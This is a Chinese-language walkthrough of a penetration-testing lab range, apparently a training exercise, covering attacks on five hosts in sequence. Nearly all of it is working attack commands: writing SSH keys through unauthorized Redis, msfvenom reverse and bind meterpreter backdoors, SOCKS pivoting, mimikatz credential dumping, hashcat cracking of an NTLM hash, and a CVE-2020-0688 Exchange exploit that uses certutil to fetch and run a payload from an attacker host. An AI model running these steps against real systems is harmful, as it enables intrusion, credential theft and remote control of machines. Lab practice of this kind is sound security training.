VPC3-redis未授权-linux横向移动-文件泄露-sqlserver数据库提权-exchange攻防-密码喷射横向移动

靶场下载：
链接: https://pan.baidu.com/s/1KGtViLjEjO4ZMgEaW2VljA 提取码: vmk6 
 

第一台ubuntu（redis未授权访问）

发现了目标主机存在未授权redis

在自己的攻击机

cd /root/.ssh

ssh-keygen #生成本地的密钥

(echo -e "\n\n"; cat /root/.ssh/id_ed25519.pub; echo -e "\n\n") >key.txt #读取密钥保存的key.txt

cat key.txt |redis-cli -h 192.168.139.148 -x set xxx #读取key.txt密钥并且连接redis目标设置xxx数据

redis-cli -h 192.168.139.148

config set slave-read-only no #修改读写权限

config set dir /root/.ssh #设置redis的备份路径为 /root/.ssh

config set dbfilename authorized_keys #设置保存文件名为 authorized_keys

save #保存

用ssh连接

msf反向上线

生成msf后门

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.139.129 LPORT=8888 -f elf > ubuntu1.elf

攻击机开启web服务

靶机将其下载下来

攻击机开始监听

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost xxx.xxx.xxx.xxx

set lport 8888

run

成功返回

第二台ubuntu(翻阅历史命令）

通过fscan扫描，发现20的主机

就开放了ssh

直接搜索history

发现没有

cat ~/.bash_history（~表示当前用户）

发现了这个、

（说明可以直接连接）

msf正向上线

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=6001 -f elf > ubuntu2.elf

在第一台靶机上

生成，后门，上传戴第一台靶机上

然后第一台靶机开启服务

在第二台靶机上下载

在kali上

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.52.20

set lport 6001

run

msf反向转发上线（补充知识）

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.52.10 LPORT=8880 -f elf > 8880.elf

生成反向后门

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

payload => linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.52.10//设置的监听机器为跳板机的ip

lhost => 192.168.52.10

msf6 exploit(multi/handler) > set lport 8880

lport => 8880

msf6 exploit(multi/handler) > run

第三台windows2012(从普通网站到数据库文件泄露提权)

信息收集

建立路由

run post/multi/manage/autoroute

设置socks代理

use auxiliary/server/socks_proxy

发现开放了80和81的web服务

代理上

发现了一个oa的系统

用proxychain 让kali代理 vim /etc/proxychains4.con

通过文件扫描

发现了www.rar的文件

打开发现是sqlserver的密码

提权

发现连接成功

msf反向上线

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.93.129 LPORT=1132 -f exe > 1132.exe

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set lport 1132

set lhost 192.168.93.129

run

第四台exchange服务器攻防

拿下后，发现是域内用户的权限

提权到system

首先getsystem提权

powershell setspn -T rootkit.org -q */*

发现dc开了exchange服务器

发现版本

miniktz提取hash,hashcat暴力破解hash

但是需要域内任意普通账户的明文和密码

像上传minikatz

mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"(需要高权限）getsystem

导出来hash

用导出来的sqladmin的hash来暴力破解

>hashcat -a 0 -m 1000 --force ccef208c6485269c20db2cad21734fe7 pass.txt

成功得到密码

CVE-2020-0688

将后门传到上一台主机

更改host

python cve-2020-0688.py -s https://192.168.3.144/owa/ -u rootkit.org\micle -p Admin12345 -c "cmd /c certutil -urlcache -split -f http://192.168.3.73/1132.exe c:\\1132.exe"

执行命令

通过release

再放回原来的位置

python cve-2020-0688.py -s https://192.168.3.144/owa/ -u rootkit.org\micle -p Admin12345 -c "cmd /c c:\\1132.exe"

上线

第五台windows（ipc)横向移动

拿下exchange服务机器后，getsystem来提权

然后用mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"来提取明文

发现有明文的密码，通过impact套件横向移动拿下